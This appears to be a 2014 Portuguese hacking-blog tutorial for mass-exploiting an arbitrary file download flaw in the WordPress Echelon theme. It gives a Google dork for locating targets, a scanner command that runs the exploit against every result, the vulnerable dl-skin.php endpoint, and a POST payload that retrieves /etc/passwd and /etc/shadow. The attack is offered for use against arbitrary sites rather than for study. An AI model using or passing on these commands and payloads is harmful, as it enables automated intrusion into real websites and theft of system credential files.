Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

terça-feira, 23 de dezembro de 2014

Tutorial/Video EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

TUTORIAL ::: E X P L O I T 

$MASS_EXPLOIT = ($Script_Exploit +  $SCANNER_INURLBR);

EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

--------------------------------------------------------------------------------------------------------------
# NAME:::::::: Wordpress A.F.D Theme Echelon
# TIPE:::::::: Arbitrary File Download

# Google DORK: inurl:/wp-content/themes/echelon
# Vendor:::::: www.wordpress.org
# Tested on::: Linux

# EXECUTE::::: php exploit.php www.alvo.com.br
# OUTPUT:::::: EXPLOIT_WPAFD_Echelon.txt
--------------------------------------------------------------------------------------------------------------

EXPLOIT::: 
DOWNLOAD::
LINK[0]::: http://pastebin.com/14uVQyUV
LINK[1]::: http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
--------------------------------------------------------------------------------------------------------------

USE::::::: MASS / USE SCANNER INURLBR
DOWNLOAD::
LINK[0]::: https://github.com/googleinurl/SCANNER-INURLBR
--------------------------------------------------------------------------------------------------------------

COMAND EXEC SCANNER INURLBR / comando de uso....
./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --command-all "php exploit.php _TARGET_"
--------------------------------------------------------------------------------------------------------------

Arquivos que o EXPLOIT verifica::

File download /etc/passwd & /etc/shadow

Failure consists of exploring a parameter $ _POST file

{alvo_target}/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
*REQUEST POST:*
_mysite_download_skin={$config['file']}&submit=Download 
ex:
 _mysite_download_skin=/etc/passwd&submit=Download

[Vídeo]
#-------------------------------------------------------------------
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE:  https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#-------------------------------------------------------------------



By: às
Marcadores: , , , ,

Um comentário:

............

Assinar: Postar comentários (Atom)